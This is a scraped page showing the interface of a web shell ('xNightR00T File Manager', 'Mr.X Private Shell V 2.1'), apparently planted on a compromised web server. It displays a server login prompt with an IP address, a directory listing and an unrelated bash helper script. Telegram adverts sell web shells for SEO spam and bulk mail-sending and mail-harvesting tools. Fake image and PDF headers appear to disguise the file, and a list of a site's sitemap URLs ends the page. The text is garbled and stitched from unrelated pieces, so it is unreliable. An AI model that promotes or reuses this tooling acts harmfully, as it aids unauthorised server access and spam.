xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# logerror "message" "/detailed/log/file"
function logerror
{
	# the point of this part is logging to STDOUT in actions
	if [ -z ${ZEND_ERROR_LOG} ]; then
		ZEND_ERROR_LOG=/dev/stdout
	elif [ ! -w ${ZEND_ERROR_LOG} ]; then
		ZEND_ERROR_LOG=/dev/stdout
	fi

	echo "$ZSST_PLUGIN_NAME: $1" >> ${ZEND_ERROR_LOG}
	if [ -r "$2" ]; then
		echo "------------- More Details -----------------------" >> ${ZEND_ERROR_LOG}
		cat "$2"  >> ${ZEND_ERROR_LOG}
		echo "--------------------------------------------------" >> ${ZEND_ERROR_LOG}
		rm -f "$2"
	fi

}


# downloadtofile "URL" "output file"
function downloadtofile
{
DL_LOG=/tmp/d0wnl0ad2F1L3.log

if command -v wget &> /dev/null ;then
	if ! wget -O $2 "$1" &> $DL_LOG ; then
		logerror "'wget $1'  FAILED" $DL_LOG
		return 21
	fi

elif command -v aria2c &> /dev/null ;then
	if ! aria2c -j 1 -s 1 -o $2 "$1" &> $DL_LOG ; then
		logerror "'aria2c $1'  FAILED" $DL_LOG
		return 22
	fi

elif command -v curl &> /dev/null ;then
	if ! curl -Lo $2 "$1" &> $DL_LOG ; then
		logerror "'curl $1'  FAILED" $DL_LOG
		return 23
	fi

else
	logerror "wget, aria2c or curl not found."
	return 1
fi
rm -f $DL_LOG
return 0
}


# yesnocommand "Prompt Message" "Cancel Message" "command"
function yesnocommand
{
	confirm="No"
	echo -e "$1 [Y/n] : \c"

	read confirm
	NOMSG="$2"
	case $(echo $confirm | cut -c1) in
		("y") echo "  Proceeding...";;
		("Y") echo "  Proceeding...";;
		("") echo "  Proceeding...";;
		("n") echo "  $NOMSG" ; echo "  Exiting..." ; exit;;
		("N") echo "  $NOMSG" ; echo "  Exiting..." ; exit;;
		(*) echo "  Your input was not recognised. $NOMSG" ; echo "  Exiting..." ; exit
	esac

	$3
}

Filemanager

Name Type Size Permission Actions
actions Folder 0775
plugins Folder 0775
db_params.lib File 984 B 0775
gdb_adv.sh File 1.56 KB 0775
help.txt File 2.35 KB 0664
mysql.php File 6.49 KB 0664
options.sh File 1.01 KB 0775
snapshot.sh File 9.51 KB 0775
st_funcs.lib File 1.6 KB 0775
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml